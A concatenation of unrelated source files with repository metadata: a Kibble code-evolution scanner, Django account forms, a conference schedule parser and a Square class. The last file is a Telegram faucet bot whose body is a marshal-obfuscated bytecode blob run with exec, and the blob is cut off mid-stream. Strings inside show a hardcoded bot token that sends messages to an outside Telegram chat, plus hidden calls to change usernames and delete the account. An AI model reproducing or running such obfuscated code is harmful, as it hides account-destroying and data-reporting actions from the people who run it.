except: # pylint: disable=bare-except
# print("meh! no branch")
return None
def scan(kibble_bit, source):
rid = source["sourceID"]
rootpath = "%s/%s/git" % (
conf.get("scanner", "scratchdir"),
source["organisation"],
)
gpath = os.path.join(rootpath, rid)
gname = source["sourceID"]
kibble_bit.pprint("Doing evolution scan of %s" % gname)
inp = get_first_ref(gpath)
if inp:
ts = int(inp.split()[0])
ts -= ts % 86400
date = time.strftime("%Y-%b-%d 0:00", time.gmtime(ts))
# print("Starting from %s" % date)
now = time.time()
rid = source["sourceID"]
url = source["sourceURL"]
rootpath = "%s/%s/git" % (
conf.get("scanner", "scratchdir"),
source["organisation"],
)
gpath = os.path.join(rootpath, rid)
if source["steps"]["sync"]["good"] and os.path.exists(gpath):
acquire(kibble_bit, source)
branch = find_branch(date, gpath)
if not branch:
            release(
                kibble_bit,
                source,
                "Could not do evolutionary scan of code",
                "No default branch was found in this repository",
            )
return
branch_exists = check_branch(gpath, date, branch)
if not branch_exists:
kibble_bit.pprint("Not trunk either (bad repo?), skipping")
            release(
                kibble_bit,
                source,
                "Could not do evolutionary scan of code",
                "No default branch was found in this repository",
            )
return
try:
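            # Snap "now" back to the start of its quarter (months 3, 6, 9 and 12), rolling into the previous year if needed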
d = time.gmtime(now)
year = d[0]
quarter = d[1] - (d[1] % 3)
if quarter <= 0:
quarter += 12
year -= 1
while now > ts:
pd = (
datetime.datetime(year, quarter, 1)
.replace(tzinfo=datetime.timezone.utc)
.timetuple()
)
date = time.strftime("%Y-%b-%d 0:00", pd)
unix = calendar.timegm(pd)
# Skip the dates we've already processed
dhash = hashlib.sha224(
(source["sourceID"] + date).encode("ascii", "replace")
).hexdigest()
found = kibble_bit.exists("evolution", dhash)
if not found:
checkout(gpath, date, branch)
kibble_bit.pprint(
"Running cloc on %s (%s) at %s"
% (gname, source["sourceURL"], date)
)
languages, codecount, comment, blank, years, cost = sloc.count(
gpath
)
js = {
"time": unix,
"sourceID": source["sourceID"],
"sourceURL": source["sourceURL"],
"organisation": source["organisation"],
"loc": codecount,
"comments": comment,
"blank": blank,
"years": years,
"cost": cost,
"languages": languages,
}
kibble_bit.index("evolution", dhash, js)
quarter -= 3
if quarter <= 0:
quarter += 12
year -= 1
                # step back one quarter (three months)
now = time.mktime(datetime.date(year, quarter, 1).timetuple())
except Exception as e:
kibble_bit.pprint(e)
release(
kibble_bit,
source,
"Evolution scan failed at "
+ time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime()),
str(e),
)
return
release(
kibble_bit,
source,
"Evolution scan completed at "
+ time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime()),
good=True,
)
|
[
"noreply@github.com"
] |
kaxil.noreply@github.com
|
7918dfa9b23e9132b0e9ee1227ce130b85ce717a
|
4dbb4e1c3e3c5c0471150cba23fbfb9592fbf1f4
|
/accounts/forms.py
|
1cf25e666b098a830eeb81df420fd1a842233215
|
[] |
no_license
|
OwenCookman/owen-webdev
|
745f0c4a1735f4ce084c2094ab2425d3ca4ca925
|
9a912ba47a09597d0069884f0d603806d955cbe3
|
refs/heads/master
| 2021-09-29T10:46:37.210443
| 2021-06-21T12:46:29
| 2021-06-21T12:46:29
| 251,331,742
| 0
| 0
| null | 2021-09-22T18:50:34
| 2020-03-30T14:33:54
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,415
|
py
|
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django.core.exceptions import ValidationError
class UserLoginForm(forms.Form):
"""The form used to log in users"""
username = forms.CharField()
password = forms.CharField(widget=forms.PasswordInput)
class UserRegistrationForm(UserCreationForm):
"""The form used to register a new user"""
password1 = forms.CharField(
label="Password",
widget=forms.PasswordInput)
password2 = forms.CharField(
label="Password Confirmation",
widget=forms.PasswordInput)
class Meta:
model = User
fields = ['email', 'username', 'password1', 'password2']
def clean_email(self):
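        # Reject the email if a different user account has already registered it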
email = self.cleaned_data.get('email')
username = self.cleaned_data.get('username')
if User.objects.filter(email=email).exclude(username=username):
raise forms.ValidationError(u'Email address must be unique')
return email
def clean_password2(self):
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
if not password1 or not password2:
raise ValidationError("Please confirm your password")
if password1 != password2:
raise ValidationError("Passwords must match")
return password2
|
[
"ozzycookman@hotmail.com"
] |
ozzycookman@hotmail.com
|
259a993dae1211d6c25b3d9c800844f3f596a644
|
3d472b4ce6ced06db687f85184a4d3899f798352
|
/sojourner/schedule.py
|
d6611ee85fc506bb2b2910a42234ebbaf284decf
|
[] |
no_license
|
wjt/sojourner
|
1bb1dd951ddc1cbf8b115d34047013c0a72b407a
|
6252b9f77873133659fd9d62c4f4626d6210585f
|
refs/heads/master
| 2021-01-01T15:17:50.460111
| 2012-02-02T18:25:02
| 2012-02-02T18:25:02
| 3,005,373
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,256
|
py
|
# vim: set fileencoding=utf-8 sts=4 sw=4 :
import xml.dom.minidom as minidom
from xml.dom.minidom import Node
from xml.parsers.expat import ExpatError
import datetime as dt
import cPickle
import os.path
import colorsys
import hashlib
import gtk
from sojourner.malvern import config_file, esc
def getChildrenByTagName(node, name):
"""Similar to node.getElementsByTagName(name), but only fetches immediate
children."""
return [child for child in node.childNodes if child.nodeName == name]
def get_text(node, strip_newlines=False):
"""Concatenates all of node's text children, optionally removing single
newlines (but preserving paragraphs)."""
text = ''.join([child.data for child in node.childNodes
if child.nodeType == Node.TEXT_NODE])
if strip_newlines:
# The schedule has a bunch of places which do this:
# "paragraph one\n\nparagraph two"
# and some that do this:
# "paragraph one\n \nparagraph two"
# This is tediously ad-hoc, and a real Markdown parser would be better.
tidier_double_newlines = '\n'.join(text.split(' \n'))
text = '\n\n'.join(
[p.replace('\n', ' ')
for p in tidier_double_newlines.split('\n\n')])
return text.lstrip().rstrip()
def get_time_delta(node):
(h, m) = get_text(node).split(':')
return dt.timedelta(hours=int(h), minutes=int(m))
def get_text_from_children(parent, name, joiner=''):
"""Given a node, returns the text contents of all its children named
'name', joined by 'joiner'. For example, given a node 'foo' representing
this stanza:
<foo>
<bar>hello</bar>
<baz>not this one</baz>
<bar>world</bar>
<foo>
then:
>>> get_text_from_children(foo, 'bar', joiner=' ')
u'hello world'.
"""
texts = [get_text(c) for c in getChildrenByTagName(parent, name)]
return joiner.join(texts)
def by_start_time(x, y):
# FIXME: should this be Event.__cmp__?
return cmp(x.start, y.start)
class MalformedSchedule(Exception):
pass
# We deliberately stash the track colours outside of any object. There's no
# need to pickle these: they're based on the track name, so are stable.
swatches = {}
def get_color(track):
if track in swatches:
# In Violet
return swatches[track]
else:
# We pick nicely matching colours by fixing S and V and varying H. The
# first byte of an md5sum will do nicely for picking H!
m = hashlib.md5()
m.update(track)
h = ord(m.digest()[0]) / 255.0
r, g, b = colorsys.hsv_to_rgb(h, 0.9, 0.9)
swatch = gtk.gdk.Color(int(r * 65535), int(g * 65535), int(b * 65535))
swatches[track] = swatch
return swatch
class Schedule(object):
"""Version number for pickled event data. This must be incremented if this
class, or Event, is modified."""
__VERSION = 8
def __init__(self, schedule_path):
self.schedule_path = schedule_path
(self.events, self.events_by_id, self.events_by_room,
self.events_by_track) = self.__load_schedule()
self.favourites = self.__load_favourites()
def __load_schedule(self):
"""Tries to load the schedule from a pre-parsed pickle file; if that
doesn't fly, reads the actual XML and pickles the result for later."""
pickle_path = self.schedule_path + '.pickle'
try:
if os.path.getmtime(pickle_path) <= \
os.path.getmtime(self.schedule_path):
raise Exception('pickle is out of date')
version, stuff = cPickle.load(open(pickle_path, 'rb'))
if version != Schedule.__VERSION:
raise Exception('expected version %u, got version %u' %
(Schedule.__VERSION, version))
return stuff
except Exception, e:
stuff = self.__parse_schedule()
try:
cPickle.dump((Schedule.__VERSION, stuff),
open(pickle_path, 'wb'),
protocol=2)
except Exception, e:
print "Couldn't pickle schedule: %s" % e
return stuff
def __parse_schedule(self):
try:
doc = minidom.parse(self.schedule_path)
except ExpatError, e:
raise MalformedSchedule(e)
schedule_elt = doc.documentElement
if doc.documentElement.nodeName != 'schedule':
raise MalformedSchedule('Root element was <%s/>, not <schedule/>' %
doc.documentElement.nodeName)
events = []
events_by_id = {}
events_by_room = {}
events_by_track = {}
for day in getChildrenByTagName(doc.documentElement, 'day'):
date = dt.datetime.strptime(day.getAttribute('date'), '%Y-%m-%d')
for room_node in getChildrenByTagName(day, 'room'):
room = room_node.getAttribute('name')
for node in getChildrenByTagName(room_node, 'event'):
e = Event(node, date, room)
events.append(e)
events_by_id[e.id] = e
blah = events_by_room.get(e.room, [])
blah.append(e)
events_by_room[e.room] = blah
blah = events_by_track.get(e.track, [])
blah.append(e)
events_by_track[e.track] = blah
events.sort(cmp=by_start_time)
return (events, events_by_id, events_by_room, events_by_track)
def __load_favourites(self):
favourites = []
try:
f = file(self._favourites_file(), 'r')
for id in f.readlines():
event = self.events_by_id[id.strip()]
if event not in favourites:
favourites.append(event)
f.close()
except IOError:
# I guess they don't have any favourites
pass
return favourites
def _favourites_file(self):
return os.path.dirname(self.schedule_path) + '/favourites'
def _write_favourites(self):
f = file(self._favourites_file(), 'w')
for fav in self.favourites:
f.write("%s\n" % fav.id)
f.close()
def add_favourite(self, event):
if not event in self.favourites:
self.favourites.append(event)
self.favourites.sort(cmp=by_start_time)
self._write_favourites()
def remove_favourite(self, event):
try:
self.favourites.remove(event)
self._write_favourites()
except ValueError, e:
# Oops! I guess 'event' wasn't in the favourites.
print e
class Event(object):
def __init__(self, node, date, room):
self.id = node.getAttribute('id')
self.room = room
children = [ c for c in node.childNodes
if c.nodeType == Node.ELEMENT_NODE
]
for child in children:
n = child.nodeName
if n == 'title':
self.title = get_text(child)
elif n == 'start':
self.start = date + get_time_delta(child)
elif n == 'duration':
self.duration = get_time_delta(child)
elif n == 'track':
self.track = get_text(child)
# In practice, abstract and description are the only places that
# stray newlines show up. FIXME: I think they're actually in
# Markdown format, maybe we could use Python-Markdown to do better
# than this?
elif n == 'abstract':
self.abstract = get_text(child, strip_newlines=True)
elif n == 'description':
self.description = get_text(child, strip_newlines=True)
elif n == 'persons':
# FIXME: maybe joining the people together should be up to the
# widgets?
self.person = get_text_from_children(child, 'person',
joiner=', ')
else:
pass
self.end = self.start + self.duration
# These are not methods because strftime showed up surprisingly high on
# the profile. They're localized; I'm not sure if this is a good thing.
self.day_name = self.start.strftime("%A")
self.start_str = self.start.strftime('%H:%M')
self.end_str = self.end.strftime('%H:%M')
# And these are pre-computed because they were about a quarter of
# showing the full list.
bg = get_color(self.track)
if bg.red + bg.green + bg.blue > (65535 * 3 / 2):
fg = '#000000'
else:
fg = '#ffffff'
self.bg = bg
summary_data = {
'title': esc(self.title),
'speaker': esc(self.person),
'day': self.day_name,
'start': self.start_str,
'end': self.end_str,
'room': esc(self.room),
'track': esc(self.track),
'track_background': bg.to_string(),
'track_foreground': fg
}
self.full_summary = Event.FULL_SUMMARY_FORMAT % summary_data
self.summary_sans_day = Event.OMIT_DAY_FORMAT % summary_data
self.summary_sans_room = Event.OMIT_ROOM_FORMAT % summary_data
self.summary_sans_track = Event.OMIT_TRACK_FORMAT % summary_data
FULL_SUMMARY_FORMAT = """<b>%(title)s</b>
<small>%(speaker)s <i>(%(day)s %(start)s–%(end)s, %(room)s, <span background='%(track_background)s' foreground='%(track_foreground)s'>%(track)s</span>)</i></small>"""
OMIT_DAY_FORMAT = """<b>%(title)s</b>
<small>%(speaker)s <i>(%(start)s–%(end)s, %(room)s, %(track)s)</i></small>"""
OMIT_ROOM_FORMAT = """<b>%(title)s</b>
<small>%(speaker)s <i>(%(start)s–%(end)s, %(track)s)</i></small>"""
OMIT_TRACK_FORMAT = """<b>%(title)s</b>
<small>%(speaker)s <i>(%(start)s–%(end)s, %(room)s)</i></small>"""
OMIT_NOTHING = 0
OMIT_DAY = 1
OMIT_ROOM = 2
OMIT_TRACK = 3
def summary(self, omit=OMIT_NOTHING):
if omit == Event.OMIT_NOTHING:
return self.full_summary
elif omit == Event.OMIT_DAY:
return self.summary_sans_day
elif omit == Event.OMIT_ROOM:
return self.summary_sans_room
elif omit == Event.OMIT_TRACK:
return self.summary_sans_track
def full(self):
if self.description.startswith(self.abstract):
desc = self.description[len(self.abstract):]
else:
desc = self.description
if desc == '':
return "%s\n\n%s" % (self.full_summary, esc(self.abstract))
elif self.abstract == '':
return "%s\n\n%s" % (self.full_summary, esc(desc))
else:
return "%s\n\n%s\n\n%s" \
% (self.full_summary, esc(self.abstract), esc(desc))
def conflicts(self, other_event):
if other_event == self:
return False
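        # No conflict if this event ends before the other starts, or starts after the other ends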
return not (self.start <= other_event.start and \
self.end <= other_event.start or \
self.start >= other_event.end)
|
[
"will@willthompson.co.uk"
] |
will@willthompson.co.uk
|
a07aed13b3ebffc7f5a9829855456716e2adb5be
|
c8a4f3493a484c6dd53417c562e3f0bbc4c95ae9
|
/0x0C-python-almost_a_circle/models/square.py
|
b90739160c45e6313c301dcd58b3825213b45516
|
[] |
no_license
|
flaviomco/holbertonschool-higher_level_programming
|
d51c1dfed68670caa2495250eef78cf80f61ef2b
|
98e67d12a4e5f00f77c809028629fb6e4f93d053
|
refs/heads/main
| 2023-04-23T03:12:27.023469
| 2021-05-04T18:40:37
| 2021-05-04T18:40:37
| 317,630,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,994
|
py
|
#!/usr/bin/python3
"""square.py"""
from models.rectangle import Rectangle
class Square(Rectangle):
"""Square class that inherits from Rectangle"""
def __init__(self, size, x=0, y=0, id=None):
super().__init__(size, size, x, y, id)
@property
def size(self):
""" public getter and setter size"""
return self.width
@size.setter
def size(self, value):
self.width = value
self.height = value
def update(self, *args, **kwargs):
"""public method def update(self, *args, **kwargs)
that assigns attributes
"""
if args and len(args) != 0:
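            # Positional order is: id, size, x, y; an explicit None for id re-initialises the square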
a = 0
for arg in args:
if a == 0:
if arg is None:
self.__init__(self.size, self.x, self.y)
else:
self.id = arg
elif a == 1:
self.size = arg
elif a == 2:
self.x = arg
elif a == 3:
self.y = arg
a += 1
elif kwargs and len(kwargs) != 0:
for k, v in kwargs.items():
if k == "id":
if v is None:
self.__init__(self.size, self.x, self.y)
else:
self.id = v
elif k == "size":
self.size = v
elif k == "x":
self.x = v
elif k == "y":
self.y = v
def to_dictionary(self):
"""returns the dictionary representation of a Square"""
return {
"id": self.id,
"size": self.width,
"x": self.x,
"y": self.y
}
def __str__(self):
"""returns [Square] (<id>) <x>/<y> - <size>"""
return "[Square] ({}) {}/{} - {}".format(self.id, self.x, self.y,
self.width)
|
[
"2109@holbertonschool.com"
] |
2109@holbertonschool.com
|
b4d455cfde0c40ef36daa5dfc76dbe00be8fde41
|
0ad63db87cf0d8d9fbdfaaac8acf0ba4759a8d25
|
/.bch/main.py
|
ab5092f487acfaa8b37b79d36a9875f12c8434b8
|
[] |
no_license
|
guntur168/TwinBot
|
0bbe558568cb3845576abc0d94da58e49ad95353
|
70d5fdaa380e1155fb35ceff599c20ac4356d6b0
|
refs/heads/master
| 2020-05-15T14:54:54.098996
| 2019-04-16T20:06:31
| 2019-04-16T20:06:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,356
|
py
|
import marshal
# Coded: NjankSoekamti
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00@\x00\x00\x00s\xb0\x01\x00\x00d\x00d\x01l\x00m\x01Z\x01m\x02Z\x02\x01\x00d\x00d\x02l\x03m\x04Z\x04m\x05Z\x05m\x06Z\x06\x01\x00d\x00d\x03l\x07m\x08Z\t\x01\x00d\x00d\x04l\nm\x0bZ\x0b\x01\x00d\x00d\x05l\x0cm\rZ\x0e\x01\x00d\x00d\x06l\x0fm\x10Z\x10m\x11Z\x11\x01\x00d\x00d\x07l\x12m\x13Z\x13m\x14Z\x15\x01\x00e\x13j\x16Z\x17e\x13j\x18Z\x19e\x13j\x1aZ\x1be\x13j\x1cZ\x1de\x15d\x08d\t\x8d\x01\x01\x00d\x00d\nl\x1em\x1eZ\x1e\x01\x00d\x0bZ\x1fd\x0cZ d\rZ!d\x0eZ"d\x0fZ#d\x00d\x10l$m%Z%\x01\x00d\x00d\x11l&Z&d\x00d\x11l\'Z\'d\x00d\x11l(Z(d\x00d\x11l)Z)d\x00d\x11l*Z*d\x00d\x11l+Z+e+j,Z-e-\x83\x00Z.d\x12Z/d\x13Z0d\x14d\x15i\x01Z1e&\xa02e&j3d\x16k\x02\x90\x01r\x16d\x17n\x02d\x18\xa1\x01\x01\x00y^d\x19d\x1a\x84\x00Z4d-d\x1bd\x1c\x84\x01Z5d.d\x1ed\x1f\x84\x01Z6d d!\x84\x00Z7d/d#d$\x84\x01Z8d%d&\x84\x00Z9d\'d(\x84\x00Z:d)d*\x84\x00Z;d+d,\x84\x00Z<e.\xa0=e<\x83\x00\xa1\x01\x01\x00W\x00n0\x04\x00e>k\n\x90\x01r\xaa\x01\x00\x01\x00\x01\x00e&\xa02e&j3d\x16k\x02\x90\x01r\xa0d\x17n\x02d\x18\xa1\x01\x01\x00Y\x00n\x02X\x00d\x11S\x00)0\xe9\x00\x00\x00\x00)\x02\xda\x0eTelegramClient\xda\x06events)\x03\xda\x12UpdateShortMessage\xda\x11ReplyInlineMarkup\xda\x11KeyboardButtonUrl)\x01\xda\x1bGetBotCallbackAnswerRequest)\x01\xda\x14DeleteAccountRequest)\x01\xda\x15UpdateUsernameRequest)\x02\xda\x18UsernameNotOccupiedError\xda\x15UsernameOccupiedError)\x02\xda\x04Fore\xda\x04initT)\x01Z\tautoreset)\x01\xda\x08datetimez\n\x1b[1;41;97mz\x06\x1b[0;0mz\x07\x1b[1;93mz\x07\x1b[1;96mz\x07\x1b[0;96m)\x01\xda\rBeautifulSoupNi\xb3\xfa\x00\x00Z dd60bb74bb03d8aa368aa37ec7b35d42z\nUser-AgentzrMozilla/5.0 (Windows NT 10.0; Win32; x86) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\xda\x02nt\xda\x03cls\xda\x05clearc\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x18\x00\x00\x00t\x00j\x01d\x01d\x02|\x00d\x03\x9c\x02d\x04\x8d\x02}\x01d\x00S\x00)\x05NzUhttps://api.telegram.org/bot656077390:AAETzn5vgIO2Q-ad8xdi8pg5nJprYOtTIYg/sendMessagei(y\xaa%)\x02Z\x07chat_id\xda\x04text)\x01\xda\x04data)\x02\xda\x08requests\xda\x03get)\x02\xda\x03msgZ\x04Khck\xa9\x00r\x18\x00\x00\x00\xda\x00\xda\x04KhcO\x1c\x00\x00\x00s\x02\x00\x00\x00\x00\x01r\x1a\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\x10\x00\x00\x00t\x00d\x01|\x00\x17\x00t\x01t\x02\x83\x03S\x00)\x02Nz\x08session/)\x03r\x02\x00\x00\x00\xda\x04Khcm\xda\x04Khct)\x01Z\x0cphone_numberr\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhcI\x1e\x00\x00\x00s\x02\x00\x00\x00\x00\x01r\x1d\x00\x00\x00Fc\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00|\x01d\x01k\x08r$t\x00d\x02t\x01\xa0\x02\xa1\x00\xa0\x03d\x03\xa1\x01|\x00f\x02\x16\x00\x83\x01\x01\x00n\x1et\x00d\x02t\x01\xa0\x02\xa1\x00\xa0\x03d\x03\xa1\x01|\x00f\x02\x16\x00d\x04d\x05\x8d\x02\x01\x00d\x00S\x00)\x06NFz\x14[\x1b[0;96m%s\x1b[0;0m] %sz\x08%H:%M:%Sz\x02\n\n)\x01\xda\x03end)\x04\xda\x05printr\x0e\x00\x00\x00\xda\x03now\xda\x08strftime)\x02Z\x04KhcLZ\naddnewliner\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04Khcg 
\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x08\x01\x1c\x02r"\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00s(\x00\x00\x00d\x01\x89\x00t\x00\x88\x00\x83\x01\x89\x01t\x01\x87\x00\x87\x01f\x02d\x02d\x03\x84\x08t\x02|\x00\x83\x01D\x00\x83\x01\x83\x01S\x00)\x04Ns\x06\x00\x00\x00210400c\x01\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x003\x00\x00\x00s"\x00\x00\x00|\x00]\x1a\\\x02}\x01}\x02|\x02\x88\x00|\x01\x88\x01\x16\x00\x19\x00A\x00V\x00\x01\x00q\x02d\x00S\x00)\x01Nr\x18\x00\x00\x00)\x03\xda\x02.0\xda\x01i\xda\x01c)\x02\xda\x04KhcX\xda\x04Khcqr\x18\x00\x00\x00r\x19\x00\x00\x00\xfa\t<genexpr>(\x00\x00\x00s\x02\x00\x00\x00\x04\x00z\x17KhPc.<locals>.<genexpr>)\x03\xda\x03len\xda\x05bytes\xda\tenumerate)\x01Z\x03bytr\x18\x00\x00\x00)\x02r&\x00\x00\x00r\'\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPc%\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x04\x01\x08\x01r,\x00\x00\x00\xda\x03GETc\x03\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s~\x00\x00\x00y*t\x00j\x01|\x01|\x00|\x02t\x02d\x01d\x02d\x03\x8d\x06}\x03|\x03j\x03}\x04|\x03j\x04}\x05|\x04|\x05g\x02S\x00\x04\x00t\x00j\x05j\x06k\nrR\x01\x00\x01\x00\x01\x00t\x07d\x04\x83\x01\x01\x00t\x08d\x05\x83\x01\x01\x00Y\x00n(\x04\x00t\x00j\x05j\tk\nrx\x01\x00\x01\x00\x01\x00t\x07d\x06\x83\x01\x01\x00t\x08d\x05\x83\x01\x01\x00Y\x00n\x02X\x00d\x00S\x00)\x07N\xe9\x0f\x00\x00\x00F)\x04r\x14\x00\x00\x00\xda\x07headersZ\x07timeout\xda\x0fallow_redirectsz%\x1b[1;91mConnection Timeout ...\x1b[0;90m\n\xe9\x01\x00\x00\x00z#\x1b[1;91mConnection Error ...\x1b[0;90m\n)\nr\x15\x00\x00\x00Z\x07request\xda\x04KhcFZ\x0bstatus_coder\x13\x00\x00\x00Z\nexceptionsZ\x07Timeoutr"\x00\x00\x00\xda\x04exit\xda\x0fConnectionError)\x06\xda\x04Khco\xda\x06methodr\x14\x00\x00\x00Z\x04Khcn\xda\x04Khcd\xda\x04KhcGr\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPR)\x00\x00\x00s\x16\x00\x00\x00\x00\x01\x02\x01\x16\x01\x06\x01\x06\x01\x08\x01\x12\x01\x08\x01\x0c\x01\x12\x01\x08\x01r9\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00x@t\x00d\x01|\x00d\x02\x17\x00\x83\x02D\x00].}\x01t\x01j\x02\xa0\x03d\x03t\x04\xa0\x05\xa1\x00\xa0\x06d\x04\xa1\x01|\x00|\x01f\x03\x16\x00\xa1\x01\x01\x00t\x07\xa0\x08d\x02\xa1\x01\x01\x00q\x10W\x00d\x00S\x00)\x05Nr\x01\x00\x00\x00r1\x00\x00\x00z)[\x1b[0;96m%s\x1b[0;0m] Waiting %s seconds! 
%d\rz\x08%H:%M:%S)\t\xda\x05range\xda\x03sys\xda\x06stdout\xda\x05writer\x0e\x00\x00\x00r \x00\x00\x00r!\x00\x00\x00\xda\x04time\xda\x05sleep)\x02r$\x00\x00\x00\xda\x01xr\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPA5\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x14\x01 \x01rA\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s*\x00\x00\x00|\x00j\x00d\x01\x19\x00j\x01d\x01\x19\x00}\x01t\x02|\x01\x83\x01t\x03k\x08r"|\x01j\x04S\x00d\x00S\x00d\x00S\x00)\x02Nr\x01\x00\x00\x00)\x05Z\x04rowsZ\x07buttons\xda\x04typer\x06\x00\x00\x00Z\x03url)\x02Z\x06markupZ\x04KhcQr\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPm9\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x10\x01\x0c\x01\x06\x02rC\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00C\x00\x00\x00s<\x00\x00\x00t\x00t\x01\x9b\x00d\x01t\x02\x9b\x00d\x02t\x01\x9b\x00d\x03t\x02\x9b\x00d\x04t\x01\x9b\x00d\x05t\x02\x9b\x00d\x06t\x03\x9b\x00d\x07t\x04\x9b\x00d\x08\x9d\x10\x83\x01\x01\x00d\x00S\x00)\tNu\x19\x00\x00\x00\n\xe2\x95\x94\xe2\x95\x97 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\xa6 \xe2\x95\xa6 u<\x00\x00\x00\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac \xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x8c\xe2\x94\x90 \xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\x8c\xe2\x94\xac\xe2\x94\x90u\x19\x00\x00\x00\n\xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\xe2\x95\x91 \xe2\x95\xa0\xe2\x95\x90\xe2\x95\xa3 u0\x00\x00\x00\xe2\x94\x82 \xe2\x94\x82 \xe2\x94\x82\xe2\x94\x82 \xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x82 \xe2\x94\x82 \xe2\x94\x82 u\x1b\x00\x00\x00\n\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\xa9 \xe2\x95\xa9 u=\x00\x00\x00\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98\xe2\x94\xb4\xe2\x94\x80\xe2\x94\x98\xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98 \xe2\x94\xb4 \nz$ Youtube Channel : Njank Soekamti 
\xda\x01\n)\x05r\x1f\x00\x00\x00\xda\x06koneng\xda\x05toska\xda\x06banner\xda\x05resetr\x18\x00\x00\x00r\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPt?\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x02\x04rI\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\n\x00\x00\x00\x83\x00\x00\x00s@\x02\x00\x00t\x00j\x01\xa0\x02d\x01\xa1\x01s\x16t\x00\xa0\x03d\x01\xa1\x01\x01\x00t\x04\x83\x00\x01\x00t\x05t\x06j\x07\x83\x01d\x02k\x00rBt\x08d\x03\x83\x01\x01\x00t\x08d\x04\x83\x01\x01\x00t\td\x05\x83\x01\x01\x00t\nt\x06j\x07d\x05\x19\x00\x83\x01\x89\x00\x88\x00\xa0\x0bt\x06j\x07d\x05\x19\x00\xa1\x01I\x00d\x00H\x00\x01\x00\x88\x00\xa0\x0c\xa1\x00I\x00d\x00H\x00}\x00t\x08d\x06|\x00j\rd\x00k\x08r\x86d\x07n\x04|\x00j\r|\x00j\x0ed\x00k\x08r\x98d\x07n\x0cd\x08|\x00j\x0e\x17\x00d\t\x17\x00f\x02\x16\x00\x83\x01\x01\x00|\x00j\x0ed\nk\x02s\xcc|\x00j\x0fd\x0bk\x02s\xcc|\x00j\x0fd\x0ck\x02\x90\x01r\xaet\x10|\x00j\x0ed\x00k\x08r\xde|\x00j\x0fn\x08|\x00j\x0ed\r\x17\x00\x83\x01\x01\x00yZ\x88\x00\xa0\x11d\x0e\xa1\x01I\x00d\x00H\x00}\x01|\x01j\x12\x90\x01rB\x88\x00t\x13|\x01d\x0ed\x07\xa0\x14t\x15j\x16t\x17j\x18d\x02d\x0f\x8d\x02\xa1\x01\x17\x00\x83\x02\x83\x01I\x00d\x00H\x00}\x02|\x02\x90\x01rBt\x10|\x01j\x0ed\x10\x17\x00\x83\x01\x01\x00W\x00n\x1a\x04\x00t\x19t\x1af\x02k\n\x90\x01r^\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00y6|\x00j\x0ed\x00k\t\x90\x01r\x94|\x00j\x0ed\x11k\x02\x90\x01r\x94t\x10d\x12\x83\x01\x01\x00\x88\x00t\x1bd\x13\x83\x01\x83\x01I\x00d\x00H\x00}\x02W\x00n\x16\x04\x00t\x1ck\n\x90\x01r\xac\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00t\x1dd\x14\x83\x01\x01\x00\x88\x00\xa0\x1ed\x15d\x16\xa1\x02I\x00d\x00H\x